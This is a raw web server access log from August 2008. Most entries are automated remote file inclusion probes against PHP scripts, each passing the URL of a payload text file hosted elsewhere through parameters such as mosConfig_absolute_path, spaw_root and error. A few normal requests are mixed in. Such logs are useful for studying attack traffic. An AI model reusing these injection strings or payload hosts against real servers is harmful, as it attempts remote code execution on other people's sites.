89.238.65.54 - - [07/Aug/2008:12:11:50 -0700] "GET /logs/access_071215.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:12:03 -0700] "GET /logs//postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:12:03 -0700] "GET //postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:12:21 -0700] "GET /logs/access_080122.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
221.120.211.2 - - [07/Aug/2008:12:12:29 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 622413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:12:29 -0700] "GET /logs//postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:12:29 -0700] "GET //postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:12:34 -0700] "GET /logs/access_080122.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:13:10 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:13:11 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:13:11 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:13:11 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:13:16 -0700] "GET /logs/access_080218.log//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:13:19 -0700] "GET //index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:13:20 -0700] "GET /logs//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:13:23 -0700] "GET /logs/access_080218.log//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:13:26 -0700] "GET //index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:13:26 -0700] "GET /logs//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.120.211.2 - - [07/Aug/2008:12:13:34 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:13:42 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:13:43 -0700] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:13:43 -0700] "GET /logs/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:14:00 -0700] "GET /logs/access_080207.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:14:08 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.113.205.242 - - [07/Aug/2008:12:14:26 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:14:30 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:14:30 -0700] "GET //config.inc.php?path_escape=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:12:14:30 -0700] "GET /logs//config.inc.php?path_escape=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:14:33 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:14:33 -0700] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:14:34 -0700] "GET /logs/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:14:49 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:15:01 -0700] "GET /logs/access_080218.log//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:15:04 -0700] "GET //index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.207.22 - - [07/Aug/2008:12:15:05 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 387584 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:15:05 -0700] "GET /logs//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:16:40 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:16:41 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:16:41 -0700] "GET /logs/access_080123.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:16:46 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:16:48 -0700] "GET ///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:16:49 -0700] "GET ///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:17:01 -0700] "GET /logs/access_080505.log/forum.php?act=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:17:09 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:17:09 -0700] "GET //admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:17:09 -0700] "GET /logs//admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:17:10 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:17:10 -0700] "GET //admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:17:10 -0700] "GET /logs//admin/index.php?o=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:17:25 -0700] "GET /logs/access_080312.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:17:34 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:17:34 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:17:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:17:51 -0700] "GET /logs/access_080505.log%20/forum.php?act=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:17:56 -0700] "GET /logs/access_071231.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:17:59 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:06 -0700] "GET /logs///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:07 -0700] "GET /logs///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:07 -0700] "GET /logs///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:07 -0700] "GET ///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:07 -0700] "GET ///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:07 -0700] "GET ///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:19:11 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:15 -0700] "GET /logs///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:19:15 -0700] "GET ///includes/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:12:20:05 -0700] "GET /bikes/CreSTOC07/?N=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.34.240.47 - - [07/Aug/2008:12:20:49 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.17.207.50 - - [07/Aug/2008:12:20:54 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "http://search.yahoo.com/search?p=cionist&ei=UTF-8&fr=FP-tab-web-t&fl=0&x=wrt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iebar)" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:20:54 -0700] "GET /logs/access_080117.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.45.97.249 - - [07/Aug/2008:12:20:57 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
78.110.50.111 - - [07/Aug/2008:12:21:02 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://monjali.athost.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.28.196.99 - - [07/Aug/2008:12:21:06 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 566288 "http://www.google.com/search?hl=en&q=contest&btnG=Google+Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Hotbar4.5.3.0; .NET CLR 1.1.4322)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:21:09 -0700] "GET /logs/!scanhttp://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:21:10 -0700] "GET /convert/mvcw.php?vwar_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:21:10 -0700] "GET /!scanhttp://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.231.132.107 - - [07/Aug/2008:12:21:12 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
220.98.120.87 - - [07/Aug/2008:12:21:33 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.226.49.43 - - [07/Aug/2008:12:21:38 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; FDM)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:21:42 -0700] "GET /logs/postscript.php?p_mode=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:21:48 -0700] "GET /postscript.php?p_mode=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:22:07 -0700] "GET /logs/access_080126.log//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:22:07 -0700] "GET //skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:22:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:22:08 -0700] "GET /logs/access_080126.log//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:22:08 -0700] "GET //skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:22:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:22:20 -0700] "GET /logs/postscript.php?p_mode=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:22:26 -0700] "GET /postscript.php?p_mode=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:22:33 -0700] "GET /logs/postscript.php?p_mode=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:22:38 -0700] "GET /postscript.php?p_mode=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.23.227.194 - - [07/Aug/2008:12:22:43 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "http://www.google.fr/search?q=scan+laser&hl=fr&lr=&start=30&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Wanadoo 6.0)" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:22:48 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:22:55 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.23.227.194 - - [07/Aug/2008:12:23:04 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 385792 "http://www.google.com/search?hl=en&q=aspx" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; MyIE2; Maxthon)" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:23:06 -0700] "GET /logs/access_080227.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:23:06 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:23:07 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.201.40.117 - - [07/Aug/2008:12:23:15 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:23:17 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:23:17 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:23:19 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [07/Aug/2008:12:24:01 -0700] "GET /logs/access_080303.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:17 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:18 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:18 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:18 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:19 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:19 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.207.22 - - [07/Aug/2008:12:24:50 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:59 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:24:59 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:25:07 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:25:07 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:25:08 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:25:12 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:25:12 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:25:13 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:25:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.59.234.45 - - [07/Aug/2008:12:25:40 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:25:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:12:25:55 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:26:11 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:26:15 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:26:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.250.206.139 - - [07/Aug/2008:12:26:17 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 238488 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:26:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
